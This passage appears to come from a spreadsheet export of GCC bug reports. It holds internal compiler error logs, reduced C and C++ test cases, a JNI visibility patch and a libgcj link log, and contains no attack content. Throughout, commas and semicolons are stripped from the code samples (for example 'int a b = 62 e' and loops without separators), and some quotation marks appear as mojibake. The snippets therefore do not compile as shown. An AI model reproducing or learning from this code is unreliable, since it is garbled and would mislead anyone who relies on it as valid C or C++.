    (expr_list:REG_EQUIV (plus:DI (reg/f:DI 1 1)
            (const_int 232 [0xe8]))
        (nil)))
nsXULContentBuilder.cpp:85: internal compiler error: in
reload_cse_simplify_operands at postreload.c:378
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccLIxm5i.out file please attach this to
your bugreport.
*******************************************
Full Compile command for pre-processed code
*******************************************
g++ -O1 -fPIC -fno-rtti -fno-exceptions -Wall -Wconversion -Wpointer-arith
-Wcast-align -Woverloaded-virtual -Wsynth -Wno-ctor-dtor-privacy
-Wno-non-virtual-dtor -Wno-long-long -mminimal-toc -fno-strict-aliasing
-Wno-deprecated -fshort-wchar -pthread -pipe  -DNDEBUG -DTRIMMED
-ffunction-sections -Wp-MD.deps/nsXULContentBuilder.pp -o
/tmp/nsXULContentBuilder.o -c /tmp/nsXULContentBuilder.CPP
********************************************
Bad option is -fno-exceptions
BUT ONLY IF -O1 is specified with it
-O2 does NOT exhibit the issue
********************************************
ppc64 src # g++  -fno-exceptions -o /tmp/nsXULContentBuilder.o -c
/tmp/nsXULContentBuilder.CPP
ppc64 src # g++ -O2 -fno-exceptions -o /tmp/nsXULContentBuilder.o -c
/tmp/nsXULContentBuilder.CPP
ppc64 src # g++ -O1 -fno-exceptions -o /tmp/nsXULContentBuilder.o -c
/tmp/nsXULContentBuilder.CPP
nsXULContentBuilder.cpp: In member function `nsresult
nsXULContentBuilder::BuildContentFromTemplate(nsIContent* nsIContent*
nsIContent* PRBool nsIRDFResource* PRBool nsTemplateMatch* nsIContent**
PRInt32*)':
nsXULContentBuilder.cpp:825: error: insn does not satisfy its constraints:
(insn 6646 6645 6535 78 (set (reg/v/f:DI 63 31 [orig:979 data ] [979])
        (plus:DI (reg/v/f:DI 63 31 [orig:979 data ] [979])
            (const_int 232 [0xe8]))) 233 {*adddi3_internal1} (nil)
    (expr_list:REG_EQUIV (plus:DI (reg/f:DI 1 1)
            (const_int 232 [0xe8]))
        (nil)))
nsXULContentBuilder.cpp:825: internal compiler error: in
reload_cse_simplify_operands at postreload.c:378
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccNgrrOI.out file please attach this to
your bugreport.</t>
  </si>
  <si>
    <t>GCC-50707</t>
  </si>
  <si>
    <t>[C++0x] Non-static const data member initializer breaks default constructor</t>
  </si>
  <si>
    <t>$ cat test.cpp 
int g
struct S {
   int const v=g
}
S s
$ g++ -std=c++0x -c ./test.cpp 
./test.cpp:7:3: error: use of deleted function â€˜S::S()â€™
./test.cpp:3:8: error: â€˜S::S()â€™ is implicitly deleted because the default definition would be ill-formed:
./test.cpp:3:8: error: uninitialized non-static const member â€˜const int S::vâ€™</t>
  </si>
  <si>
    <t>GCC-68434</t>
  </si>
  <si>
    <t>[concepts] function tsubst sets TYPE_CANONICAL before setting a type's PLACEHOLDER_TYPE_CONSTRAINTS</t>
  </si>
  <si>
    <t>The code below generates this ICE when compiled with 
g++ (GCC) 6.0.0 20151118 (experimental)
 constexpr bool C1() constexpr bool C2() constexpr bool C3()
reduce2.cpp: At global scope:
reduce2.cpp:19:10: internal compiler error: same canonical type node for different types C2 and C1
 auto f(C3) {
          ^
0x8fb760 comptypes(tree_node* tree_node* int)
	../../src-orig/gcc/cp/typeck.c:1435
0x9857e8 cp_tree_equal(tree_node* tree_node*)
	../../src-orig/gcc/cp/tree.c:3128
0x9857a1 cp_tree_equal(tree_node* tree_node*)
	../../src-orig/gcc/cp/tree.c:3121
0x9857a1 cp_tree_equal(tree_node* tree_node*)
	../../src-orig/gcc/cp/tree.c:3121
0xa17928 insert
	../../src-orig/gcc/cp/logic.cc:131
0xa17c8d left_conjunction
	../../src-orig/gcc/cp/logic.cc:237
0xa17e6d decompose_left_term
	../../src-orig/gcc/cp/logic.cc:292
0xa17f07 decompose_left_goal
	../../src-orig/gcc/cp/logic.cc:315
0xa17f5d decompose_left
	../../src-orig/gcc/cp/logic.cc:327
0xa18179 decompose_assumptions(tree_node*)
	../../src-orig/gcc/cp/logic.cc:373
0xa12af0 build_constraints(tree_node* tree_node*)
	../../src-orig/gcc/cp/constraint.cc:1035
0x780e0f grokfndecl
	../../src-orig/gcc/cp/decl.c:7819
0x78c25d grokdeclarator(cp_declarator const* cp_decl_specifier_seq* decl_context int tree_node**)
	../../src-orig/gcc/cp/decl.c:11292
0x79f2c9 start_function(cp_decl_specifier_seq* cp_declarator const* tree_node*)
	../../src-orig/gcc/cp/decl.c:14069
0x8bd2c1 cp_parser_function_definition_from_specifiers_and_declarator
	../../src-orig/gcc/cp/parser.c:24703
0x8b09bd cp_parser_init_declarator
	../../src-orig/gcc/cp/parser.c:17972
0x8a6d64 cp_parser_simple_declaration
	../../src-orig/gcc/cp/parser.c:11971
0x8a6b22 cp_parser_block_declaration
	../../src-orig/gcc/cp/parser.c:11843
0x8a689c cp_parser_declaration
	../../src-orig/gcc/cp/parser.c:11740
0x8a63a7 cp_parser_declaration_seq_opt
	../../src-orig/gcc/cp/parser.c:11619
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions
//////////////////////////////////////////////////////////////
template                                                                  
concept bool C1() {                                                              
  return true                                                                   
}                                                                                
template                                                                  
concept bool C2() {                                                              
  return true                                                                   
}                                                                                
template                                                             
concept bool C3() {                                                              
  return requires(Expr expr) {                                                   
      {expr}-&gt;C1                                                                
      {expr}-&gt;C2                                                                
  }                                                                             
}                                                                                
auto f(C3) {                                                                     
} 
//////////////////////////////////////////////////////////////</t>
  </si>
  <si>
    <t>GCC-30999</t>
  </si>
  <si>
    <t>support for GCC4.0's fvisibility option in JNIEXPORT macro</t>
  </si>
  <si>
    <t>For a patch implementing this proposal see the end of this Description.
This proposal has been submitted to SUN as well for inclusion
in a future JDK. Below is the full text of the proposal to SUN
and the answer.
************************************************
Dear Java Developer
Thank you for your interest in improving the quality of Java Technology.
Your report has been assigned an internal review ID of 680323 which is NOT visible on the Sun Developer Network (SDN).
Please be aware that the large volume of reports we receive sometimes prevents us from responding individually to each message.
We currently have a three week average response time.  If the information is determined to be a new Bug or RFE or a duplicate of a known Bug or RFE you will receive a followup email containing a seven digit bug number.  You may search for view or vote for this bug in the Bug Database at http://bugs.sun.com/.
If you just reported an issue that could have a major impact on your project and require a timely response please consider purchasing one of the support offerings described at http://java.sun.com/support/index.html.
The Sun Developer Network (http://developers.sun.com) is a free service that Sun offers. To join visit http://developers.sun.com/global/join_sdn.html.
For a limited time SDN members can obtain fully licensed Java IDEs for web and enterprise development.  More information is at http://developers.sun.com/prodtech/javatools/free/.
Thank you for using our bug submit page.
Regards
Java Developer Bug Report Review Team
---------------------------------------------------------------
dateCreated: Fri Apr 07 07:41:29 MDT 2006
type:        rfe
cust_name:   Jan Nijtmans
cust_email:  jan.nijtmans@gmail.com
jdcid:       nijtmans
status:      Waiting
category:    java
subcategory: native_interface
company:     LogicaCMG
release:     5.0
hardware:    x86
OSversion:   linux
priority:    4
synopsis:    support for GCC4.0's -fvisibility option in JNIEXPORT macro
description: A DESCRIPTION OF THE REQUEST :
Currently the macro JNIEXPORT is defined in jni_md.h as empty:
#define JNIEXPORT
This means that on UNIX marking a symbols as exportable has no effect.
However GCC 4.x has a new option -fvisibility=hidden which allows all symbols which are not marked specially to be hidden from a shared library. This feature is similar to Windows where only symbols marked with  __declspec(dllexport) are exported from dll's.
Therefore I suggest to change this line to:
#if defined(__GNUC__) &amp;&amp; __GNUC__ &gt; 3
#define JNIEXPORT __attribute__ ((visibility(default)))
#else
#define JNIEXPORT
#endif
This allows code to be compiled with gcc 4.x to be compiled with -fvisibility=hidden while still all JNI functions are exported.
JUSTIFICATION :
This enhancements makes it possible to reduce the size of JNI libraries significantly. This helps the start-up time a lot. For more information see:
     http://gcc.gnu.org/wiki/Visibility
This page explains much better what is going on that I could do it here.
For gcc 3.x and earlier or any other compiler this change has no effect.
EXPECTED VERSUS ACTUAL BEHAVIOR :
EXPECTED -
If a JNI library is compiled with GCC 4.x using the option -fvisibility=hidden I expect that still all JNI functions are exported.
ACTUAL -
When using -fvisibility=hidden with GCC 4.x all JNI functions would be hidden so this option is not usable with JNI libraries.
CUSTOMER SUBMITTED WORKAROUND :
A workaround is placing the following in all JNI code:
#include 
#if !defined(_WIN32) &amp;&amp; defined(__GNUC__) &amp;&amp; __GNUC__ &gt; 3
#undef JNIEXPORT
#define JNIEXPORT __attribute__ ((visibility(default)))
#endif
workaround:
comments:    (company - LogicaCMG  email - jan.nijtmans@gmail.com)
Index: libjava/include/jni_md.h
===================================================================
--- libjava/include/jni_md.h	(revision 122411)
+++ libjava/include/jni_md.h	(working copy)
@@ -1246 +12419 @@
 #define JNICALL          __stdcall
+#else /* !( _WIN32 || __WIN32__ || WIN32) */
+
+#define JNIIMPORT
+#if defined(__GNUC__) &amp;&amp; __GNUC__ &gt; 3
+#define JNIEXPORT __attribute__ ((visibility(default)))
+#else
+#define JNIEXPORT
+#endif
+
+#define JNICALL
+
+#endif /* !( _WIN32 || __WIN32__ || WIN32) */
+
 /* These defines apply to symbols in libgcj */
 #ifdef __GCJ_DLL__
 # ifdef __GCJ_JNI_IMPL__
@@ -13514 +1484 @@
 # define _CLASSPATH_JNIIMPEXP
 #endif /*  __GCJ_DLL__ */
-#else /* !( _WIN32 || __WIN32__ || WIN32) */
-
-#define JNIIMPORT
-#define JNIEXPORT
-#define JNICALL
-#define _CLASSPATH_JNIIMPEXP
-
-#endif /* !( _WIN32 || __WIN32__ || WIN32) */
-
-
 #endif /* __GCJ_JNI_MD_H__ */</t>
  </si>
  <si>
    <t>jan.nijtmans</t>
  </si>
  <si>
    <t>GCC-6467</t>
  </si>
  <si>
    <t>Wrong interactions between sjlj-exceptions and inline functions in GCC 2.95.3 on FreeBSD</t>
  </si>
  <si>
    <t>I had to make the following changes to our system gcc to stop it from miscompiling OpenOffice code:
1. Changes to integrate.c deal with the problem demonstrated by the code in the How To Repeat section below. If inline function which uses exception handling is being integrated into a function which does not itself contain any try/catch constructs several global flags values are not set correctly. The current_function_has_nonlocal_label flags is not getting set in particular. This allows GCC to allocate registers across function	calls. When exception is thrown in called functions the exception handler is reached with global registers (ebx edi esi) content clobbered without gcc ever noticing that. The STLPort test suite failure on FreeBSD was caused by exactly this bug.
2. Changes in expr.c fix the problem demonstrated by the second code snippet below. I did not make a complete test case with nice printfs out of it but if you compile it with g++ -O -S and then look into assembly code you will notice rogue 'add $16 %esp' assembly instruction in return case. GCC defers adjusting stack pointer after function calls until absolutely necessary but sometimes fails to do in at the right time. In this case the bogus stack pointer adjustment is a leftover from a __cp_push_exception call done as a part of the throw statement processing. In DWARF2 case stack was getting adjusted at the right time as a side effect of expand_eh_region_end. sjlj-exceptions do not use this function so I added a call to do_pending_stack_adjust in its place. Alternatively stack adjustment could be done right before a call to __sjthrow is expanded but I think the current patch keeps us closer to DWARF2-based exceptions code flow. One nice side effect of this approach is that 'add $16 %esp' is getting optimized away at the first flow optimization pass as non-reachable. This patch
fixes the problem with saxparser found by Martin Blapp who is currently trying to create OpenOffice port for FreeBSD.
Release:
2.95.3 + patches from 2.59 branch (FreeBSD system compiler)
Environment:
gcc version 2.95.4 20020320 [FreeBSD]
How-To-Repeat:
 The following code demonstrates the problem #1:
================= Begin ====================
void do_nothing()
{
    __asm (movl $0 %%esi : : :%esi)
    throw 5
}
int __inline crash()
{
    register int test = 0
    try {
        test = 35
        do_nothing()
    }
    catch(...) {
        test--
    }
    return test
}
extern C
int printf(const char * ...)
void main()
{
    int ret = crash()
    printf(%d\n ret)
}
================= End   ====================
This example demonstrates the problem #2. Not
as complete as the first example you will need
to compile it to assembly. Look for the following
asembly fragment:
        movl -120(%ebp)%edx
        movl 4(%edx)%eax
        movl 4(%eax)%edx
        movl (%edx)%edx
        movl %edx4(%eax)
        addl $16%esp        # &lt;== This add is bogus
        addl $-12%esp       # Pushing arguments to guard_operate
        movl -124(%ebp)%eax # will stomp over saved registers
        pushl %eax           # Here goes calling function's EBX :)
        call guard_operate__FP5Guard
        movl -120(%ebp)%edx
        movl 4(%edx)%eax
        movl (%eax)%eax
        movl %eax4(%edx)
================= Begin ====================
class Guard
void  guard_operate(Guard *pG)
class Guard
{
public:
    Guard()
    {
	guard_operate(this)
    }
    ~Guard()
    {
	guard_operate(this)
    }
}
class SimpleRegistryImpl
{
public:
    SimpleRegistryImpl()
    ~SimpleRegistryImpl()
    virtual void open() throw(int)
}
extern int flag
void SimpleRegistryImpl::open( ) 
	throw(int)
{
        __asm(int3)
       	Guard aGuard
	if ( flag )
	{
		return
	}
	throw 5
}
================= End   ====================</t>
  </si>
  <si>
    <t>GCC-14401</t>
  </si>
  <si>
    <t>[3.3 regression] Uninitialized reference error not reported.</t>
  </si>
  <si>
    <t>G++ erroneously compiles this code:
  struct { struct { int } bar  } foo 
which should caues an error because the implicitly generated 
constructor for foo.bar cannot initialize foo.bar.i .</t>
  </si>
  <si>
    <t>GCC-65216</t>
  </si>
  <si>
    <t>The current gcc trunk miscompiles the following code on x86_64-linux at -O3 in both 32-bit and 64-bit modes. 
This is a regression from 4.9.x. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/5.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 5.0.0 20150225 (experimental) [trunk revision 220958] (GCC) 
$ 
$ gcc-trunk -O2 small.c a.out
$ gcc-4.9 -O3 small.c a.out
$ 
$ gcc-trunk -O3 small.c
$ ./a.out
Aborted (core dumped)
$ 
--------------------------------------
int a b = 62 e
volatile int c
volatile int d
int
main ()
{
  int f = a = 0
  for ( a &lt; 2 a++)
    {
      b 
      for (e = 0 e &lt; 6 e++)
	if (c)
	  f = d
    }
  if (b != 0) 
    __builtin_abort () 
  return 0
}</t>
  </si>
  <si>
    <t>GCC-52215</t>
  </si>
  <si>
    <t>[4.7 Regression] __atomic_compare_exchange_n for enumeration type changes signature with -m32</t>
  </si>
  <si>
    <t>Between revisions 184107 (OK) and 184111 (see http://gcc.gnu.org/ml/gcc-regression/2012-02/msg00033.html and http://gcc.gnu.org/ml/gcc-regression/2012-02/msg00035.html  likely r184110) the test ext/profile/mutex_extensions_neg.cc has started to fail with -m32. The error is
FAIL: ext/profile/mutex_extensions_neg.cc (test for excess errors)
Excess errors:
/opt/gcc/build_w/x86_64-apple-darwin10.8.0/i386/libstdc++-v3/include/profile/impl/profiler_state.h:52:28: error: conversion from 'enum __gnu_profile::__state_type*' to 'enum __gnu_profile::__state_type' [-fpermissive]</t>
  </si>
  <si>
    <t>GCC-61980</t>
  </si>
  <si>
    <t>ICE: in compute_affine_dependence at tree-data-ref.c:4233 with -fcheck-data-deps</t>
  </si>
  <si>
    <t>GCC-4.9.1
x86_64-apple-darwin11.4.2
Running the following tests:
1) 
make -s -C gcc check-gcc RUNTESTFLAGS=dg.exp=pr39794.c --target_board=unix/-fcheck-data-deps
GCC throw an ICE:
------------------------------------------------------------------------
/Users/sabrinasouto/Downloads/gcc4.9/gcc-4.9.1/gcc/testsuite/gcc.dg/pr39794.c: In function 'foo':
/Users/sabrinasouto/Downloads/gcc4.9/gcc-4.9.1/gcc/testsuite/gcc.dg/pr39794.c:8:1: internal compiler error: in compute_affine_dependence at tree-data-ref.c:4233
/Users/sabrinasouto/Downloads/gcc4.9/gcc-4.9.1/gcc/testsuite/gcc.dg/pr39794.c:8:1: internal compiler error: Abort trap: 6
xgcc: internal compiler error: Abort trap: 6 (program cc1)
FAIL: gcc.dg/pr39794.c (internal compiler error)
FAIL: gcc.dg/pr39794.c (test for excess errors)
Excess errors:
(Number of distance vectors differ: Banerjee has 1 Omega has 0.
Banerjee dist vectors:
  1 
Omega dist vectors:
data dependence relation:
(Data Dep: 
#(Data Ref: 
#  bb: 5 
#  stmt: _9 = *_8
#  ref: *_8
#  base_object: *a_5(D)
#  Access function 0: {0B + 4}_1
#)
#(Data Ref: 
#  bb: 5 
#  stmt: *_14 = _21
#  ref: *_14
#  base_object: *a_5(D)
#  Access function 0: {4B + 4}_1
#)
  access_fn_A: {0B + 4}_1
  access_fn_B: {4B + 4}_1
 (subscript 
  iterations_that_access_an_element_twice_in_A: [1 + 1 * x_1]
  last_conflict: 2147483646
  iterations_that_access_an_element_twice_in_B: [0 + 1 * x_1]
  last_conflict: 2147483646
  (Subscript distance: 1 ))
  inner loop index: 0
  loop nest: (1 )
)
)
------------------------------------------------------------------------
2)
make -s -C gcc check-gcc RUNTESTFLAGS=dg.exp=20090922-1.c --target_board=unix/-fcheck-data-deps
GCC throw an ICE:
------------------------------------------------------------------------
/Users/sabrinasouto/Downloads/gcc4.9/gcc-4.9.1/gcc/testsuite/gcc.dg/20090922-1.c: In function 'test':
/Users/sabrinasouto/Downloads/gcc4.9/gcc-4.9.1/gcc/testsuite/gcc.dg/20090922-1.c:33:1: internal compiler error: in compute_affine_dependence at tree-data-ref.c:4233
/Users/sabrinasouto/Downloads/gcc4.9/gcc-4.9.1/gcc/testsuite/gcc.dg/20090922-1.c:33:1: internal compiler error: Abort trap: 6
xgcc: internal compiler error: Abort trap: 6 (program cc1)
FAIL: gcc.dg/20090922-1.c (internal compiler error)
FAIL: gcc.dg/20090922-1.c (test for excess errors)
Excess errors:
(Number of distance vectors differ: Banerjee has 2 Omega has 1.
Banerjee dist vectors:
  0 
  1 
Omega dist vectors:
  0 
data dependence relation:
(Data Dep: 
#(Data Ref: 
#  bb: 19 
#  stmt: _47 = MEM[(struct U *)v_19 + 16B].u3
#  ref: MEM[(struct U *)v_19 + 16B].u3
#  base_object: MEM[(struct U *)v_19 + 16B]
#  Access function 0: 64
#)
#(Data Ref: 
#  bb: 19 
#  stmt: MEM[(struct U *)v_19 + 16B].u3 = _50
#  ref: MEM[(struct U *)v_19 + 16B].u3
#  base_object: MEM[(struct U *)v_19 + 16B]
#  Access function 0: 64
#)
  access_fn_A: 64
  access_fn_B: 64
 (subscript 
  iterations_that_access_an_element_twice_in_A: [0]
  last_conflict: scev_not_known
  iterations_that_access_an_element_twice_in_B: [0]
  last_conflict: scev_not_known
  (Subscript distance: 0 ))
  inner loop index: 0
  loop nest: (4 )
  distance_vector:   0 
  direction_vector:     =
)
)
------------------------------------------------------------------------
Can anyone confirm these bugs?</t>
  </si>
  <si>
    <t>GCC-26826</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in reg_or_subregno at jump.c:2011</t>
  </si>
  <si>
    <t>/space/rguenther/install/gcc-4.1.0/bin/gcc -O -fomit-frame-pointer -march=i586 -S nvl160095.3-2.min.i -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: /space/rguenther/src/svn/gcc-4_1-branch/configure --enable-cxa_at_exit --enable-threads=posix --enable-languages=cc++fortran --enable-checking=release --prefix=/space/rguenther/install/gcc-4.1.0
Thread model: posix
gcc version 4.1.0
 /space/rguenther/install/gcc-4.1.0/libexec/gcc/i686-pc-linux-gnu/4.1.0/cc1 -fpreprocessed nvl160095.3-2.min.i -quiet -dumpbase nvl160095.3-2.min.i -march=i586 -auxbase nvl160095.3-2.min -O -version -fomit-frame-pointer -o nvl160095.3-2.min.s
GNU C version 4.1.0 (i686-pc-linux-gnu)
        compiled by GNU C version 4.1.0.
GGC heuristics: --param ggc-min-expand=99 --param ggc-min-heapsize=129574
Compiler executable checksum: 7939d08ae804c1d1531a5f156c80434a
nvl160095.3-2.min.i: In function â€˜AppPlci_hold_replyâ€™:
nvl160095.3-2.min.i:29: warning: assignment makes pointer from integer without a cast
nvl160095.3-2.min.i: At top level:
nvl160095.3-2.min.i:46: warning: initialization from incompatible pointer type
nvl160095.3-2.min.i: In function â€˜plci_cc_hold_rejâ€™:
nvl160095.3-2.min.i:44: internal compiler error: in reg_or_subregno at jump.c:2011
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
adding -mtune=pentiumpro or removing -march=i586 fixes the problem</t>
  </si>
  <si>
    <t>GCC-2935</t>
  </si>
  <si>
    <t>internal compiler error gcc</t>
  </si>
  <si>
    <t>say i have a debug class every other class in my project implements it to
get sensible debugging. this class has a method dbgout(char *str) 
which prints debuggee infos for corresponding classes.
class debug {
  debug(char *name) { ... }
  dbgout(char *str) { cout &lt;&lt; [&lt;&lt; name &lt;&lt; ]: &lt;&lt;str }
}
class a : public debug 
{ ... }
class b : public debug
{ ... }
here the internal compiler error appears:
class c : public a public b {
void foo() { dbgout(foo fighter) }
}
this produces the error. because gcc cant decide which dbgout() to use.
by replacing foo with
void foo() { a::dbgout(foobidoo) }
it works.
aint the compiler smart enough to say something like: could not decide which symbol to use??
i hope the description is good enough for those sorts of things
Release:
unknown
Environment:
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.95.3/specs
gcc version 2.95.3 20010315 (release)
on a RH7.0 system using kernel 2.4.4 (which doesnt matter i suppose)
How-To-Repeat:
see above</t>
  </si>
  <si>
    <t>deepblur</t>
  </si>
  <si>
    <t>GCC-5145</t>
  </si>
  <si>
    <t>[cygwin] Failure of test 23_containers/map_operators.cc</t>
  </si>
  <si>
    <t>Test 23_containers/map_operators.cc fails with attached error message about no 
   match for `std::_Rb_tree_iterator 
   std::pair&amp; std::pair*&gt;&amp; 
   != std::_Rb_tree_iterator 
   std::pair&amp; std::pair&lt;const std::string 
   unsigned int&gt;*&gt;' operator
Benjamin Kosnik  writes:
both libstdc++/5145 and libstdc++/5146 are the same issue.
These tests should fail if they don't it's an error. 
You'd think that this is just a question of doing 
dg-error on the line in question but it doesn't seem 
too work with multi-line C++ errors or something so
the excess errors part was put in.
If you can think of a better way to do this and or one 
that eliminates the excess errors markings in these two
files I'm all ears.
-benjamin
Release:
gcc 3.1 2001-12-17
Environment:
i686-pc-cygwin
How-To-Repeat:
${srcdir}/configure --host=i686-pc-cygwin --enable-threads=posix --disable-libgcj --enable-sjlj-exceptions --with-system-zlib --disable-nls --disable-shared
make
make check</t>
  </si>
  <si>
    <t>GCC-19934</t>
  </si>
  <si>
    <t>[4.0 regression] [alpha-linux] bootstrap error linking libgcj</t>
  </si>
  <si>
    <t>2005-02-12 the link error is known on mips{el}-linux first time I see it on
alpha-linux as well.
  Matthias
Creating list of files to link...
/bin/sh ./libtool --tag=CXX --mode=link
/build/buildd/gcc-snapshot-20050212/build/gcc/xgcc -shared-libgcc
-B/build/buildd/gcc-snapshot-20050212/build/gcc/ -nostdinc++
-L/build/buildd/gcc-snapshot-20050212/build/alpha-linux-gnu/libstdc++-v3/src
-L/build/buildd/gcc-snapshot-20050212/build/alpha-linux-gnu/libstdc++-v3/src/.libs
-B/usr/lib/gcc-snapshot/alpha-linux-gnu/bin/
-B/usr/lib/gcc-snapshot/alpha-linux-gnu/lib/ -isystem
/usr/lib/gcc-snapshot/alpha-linux-gnu/include -isystem
/usr/lib/gcc-snapshot/alpha-linux-gnu/sys-include
-L/build/buildd/gcc-snapshot-20050212/build/alpha-linux-gnu/libjava -mieee -g
-O2  -o libgcj.la -objectlist libgcj.objectlist \
external/sax/libsax_convenience.la external/w3c_dom/libw3c_convenience.la
../libffi/libffi_convenience.la  ../boehm-gc/libgcjgc_convenience.la
gnu/regexp/MessagesBundle.properties.lo
gnu/regexp/MessagesBundle_fr.properties.lo
org/ietf/jgss/MessagesBundle.properties.lo  \
-rpath /usr/lib/gcc-snapshot/lib -rpath /usr/lib/gcc-snapshot/lib  -lpthread
./libltdl/libltdlc.la -lz -version-info `grep -v '^#'
../../../src/libjava/libtool-version` 
creating reloadable object files...
creating a temporary reloadable object file: .libs/libgcj.la-2.o
ld -r -o .libs/libgcj.la-1.o .libs/prims.o .libs/jni.o .libs/exception.o
.libs/link.o .libs/defineclass.o .libs/interpret.o .libs/verify.o
gnu/gcj/.libs/natCore.o gnu/gcj/convert/.libs/JIS0208_to_Unicode.o
gnu/gcj/convert/.libs/JIS0212_to_Unicode.o 
[...]
gnu/xml/xpath/.libs/Predicate.o gnu/xml/xpath/.libs/Path.o
gnu/xml/xpath/.libs/OrExpr.o 
ld -r -o .libs/libgcj.la-2.o gnu/xml/xpath/.libs/LangFunction.o
gnu/xml/xpath/.libs/StartsWithFunction.o
gnu/xml/xpath/.libs/SubstringAfterFunction.o gnu/xml/xpath/.libs/FloorFunction.o
gnu/xml/xpath/.libs/NotFunction.o gnu/xml/xpath/.libs/Root.o
gnu/xml/xpath/.libs/PositionFunction.o gnu/xml/xpath/.libs/VariableReference.o
gnu/xml/xpath/.libs/DocumentOrderComparator.o
gnu/xml/xpath/.libs/LocalNameFunction.o
gnu/xml/xpath/.libs/NamespaceUriFunction.o
gnu/xml/xpath/.libs/TranslateFunction.o gnu/xml/xpath/.libs/FalseFunction.o
gnu/xml/xpath/.libs/AndExpr.o gnu/xml/xpath/.libs/XPathParser.o
gnu/xml/xpath/.libs/NamespaceTest.o gnu/xml/xpath/.libs/ConcatFunction.o
gnu/xml/xpath/.libs/NameTest.o gnu/xml/xpath/.libs/CountFunction.o
gnu/xml/xpath/.libs/IdFunction.o gnu/xml/xpath/.libs/LastFunction.o
gnu/xml/xpath/.libs/XPathTokenizer.o gnu/xml/xpath/.libs/Steps.o
gnu/xml/xpath/.libs/TrueFunction.o gnu/xml/xpath/.libs/BooleanFunction.o
gnu/xml/xpath/.libs/ParenthesizedExpr.o gnu/xml/xpath/.libs/XPathImpl.o
gnu/xml/xpath/.libs/Selector.o gnu/xml/xpath/.libs/RoundFunction.o
gnu/xml/xpath/.libs/SubstringBeforeFunction.o gnu/xml/xpath/.libs/Function.o
gnu/xml/xpath/.libs/CeilingFunction.o gnu/xml/xpath/.libs/RelationalExpr.o
gnu/xml/xpath/.libs/FunctionCall.o gnu/xml/xpath/.libs/NodeTypeTest.o
gnu/xml/xpath/.libs/ArithmeticExpr.o gnu/xml/xpath/.libs/Test.o
gnu/xml/xpath/.libs/ContainsFunction.o gnu/xml/pipeline/.libs/EventFilter.o
gnu/xml/pipeline/.libs/NSFilter.o gnu/xml/pipeline/.libs/XsltFilter.o
gnu/xml/pipeline/.libs/ValidationConsumer.o
gnu/xml/pipeline/.libs/PipelineFactory.o gnu/xml/pipeline/.libs/TextConsumer.o
gnu/xml/pipeline/.libs/LinkFilter.o gnu/xml/pipeline/.libs/TeeConsumer.o
gnu/xml/pipeline/.libs/DomConsumer.o gnu/xml/pipeline/.libs/EventConsumer.o
gnu/xml/pipeline/.libs/WellFormednessFilter.o
gnu/xml/pipeline/.libs/XIncludeFilter.o gnu/xml/pipeline/.libs/CallFilter.o
gnu/xml/aelfred2/.libs/XmlParser.o gnu/xml/aelfred2/.libs/XmlReader.o
gnu/xml/aelfred2/.libs/JAXPFactory.o gnu/xml/aelfred2/.libs/ContentHandler2.o
gnu/xml/aelfred2/.libs/SAXDriver.o gnu/xml/util/.libs/XCat.o
gnu/xml/util/.libs/DomParser.o gnu/xml/util/.libs/XMLWriter.o
gnu/xml/util/.libs/Resolver.o gnu/xml/util/.libs/DoParse.o
gnu/xml/util/.libs/XHTMLWriter.o gnu/xml/util/.libs/SAXNullTransformerFactory.o
gnu/xml/dom/.libs/DomCDATA.o gnu/xml/dom/.libs/DomXPathNSResolver.o
gnu/xml/dom/ls/.libs/DomLSEx.o gnu/xml/dom/ls/.libs/FilteredSAXEventSink.o
gnu/xml/dom/ls/.libs/DomLSSerializer.o gnu/xml/dom/ls/.libs/DomLSInput.o
gnu/xml/dom/ls/.libs/DomLSOutput.o gnu/xml/dom/ls/.libs/SAXEventSink.o
gnu/xml/dom/ls/.libs/DomLSParser.o gnu/xml/dom/ls/.libs/ReaderInputStream.o
gnu/xml/dom/ls/.libs/WriterOutputStream.o gnu/xml/dom/.libs/DomElement.o
gnu/xml/dom/.libs/DomNsNode.o gnu/xml/dom/.libs/DomAttr.o
gnu/xml/dom/.libs/DomPI.o gnu/xml/dom/.libs/DTDAttributeTypeInfo.o
gnu/xml/dom/.libs/DomDocumentBuilder.o gnu/xml/dom/.libs/DTDElementTypeInfo.o
gnu/xml/dom/.libs/DomEx.o gnu/xml/dom/.libs/DomDocument.o
gnu/xml/dom/.libs/DomXPathExpression.o
gnu/xml/dom/.libs/DomDocumentConfiguration.o gnu/xml/dom/.libs/Consumer.o
gnu/xml/dom/.libs/DomComment.o gnu/xml/dom/.libs/DomCharacterData.o
gnu/xml/dom/.libs/DomExtern.o gnu/xml/dom/.libs/DomEntityReference.o
gnu/xml/dom/.libs/DomNamedNodeMap.o gnu/xml/dom/.libs/ImplementationList.o
gnu/xml/dom/.libs/ImplementationSource.o gnu/xml/dom/.libs/DomImpl.o
gnu/xml/dom/.libs/DomDoctype.o gnu/xml/dom/.libs/DomNode.o
gnu/xml/dom/.libs/DomXPathResult.o gnu/xml/dom/.libs/DomDocumentBuilderFactory.o
gnu/xml/dom/.libs/DomText.o gnu/xml/dom/.libs/DomNSResolverContext.o
gnu/xml/dom/.libs/DomNodeIterator.o gnu/xml/dom/.libs/DomNotation.o
gnu/xml/dom/.libs/JAXPFactory.o gnu/xml/dom/.libs/DomIterator.o
gnu/xml/dom/.libs/DomFragment.o gnu/xml/dom/.libs/DomEvent.o
gnu/xml/dom/.libs/DomEntity.o gnu/xml/transform/.libs/GenerateIdFunction.o
gnu/xml/transform/.libs/FormatNumberFunction.o
gnu/xml/transform/.libs/ValueOfNode.o gnu/xml/transform/.libs/ApplyImportsNode.o
gnu/xml/transform/.libs/WithParam.o gnu/xml/transform/.libs/DocumentFunction.o
gnu/xml/transform/.libs/SAXSerializer.o
gnu/xml/transform/.libs/FunctionAvailableFunction.o
